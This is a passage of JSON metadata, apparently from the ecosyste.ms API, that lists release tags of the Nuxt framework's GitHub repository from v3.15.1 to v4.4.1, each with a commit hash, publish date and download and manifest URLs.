t@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.1/manifests"},{"name":"v3.21.2","sha":"725f134d10cb5df8736324f6c42a9f651d203211","kind":"commit","published_at":"2026-03-12T11:26:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.2/manifests"},{"name":"v4.4.0","sha":"31028d2e04cb83e4a59ef346e2769b4af13c9351","kind":"commit","published_at":"2026-03-12T08:28:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.0/manifests"},{"name":"v4.3.1","sha":"7f7baf669184f626fdb1da124cf1f3986831b550","kind":"commit","published_at":"2026-02-07T16:33:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.1/manifests"},{"name":"v3.21.1","sha":"5d57cf39cbcd15f7ff98d2a09f471ea1ecaa4a29","kind":"commit","published_at":"2026-02-07T16:33:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.1/manifests"},{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar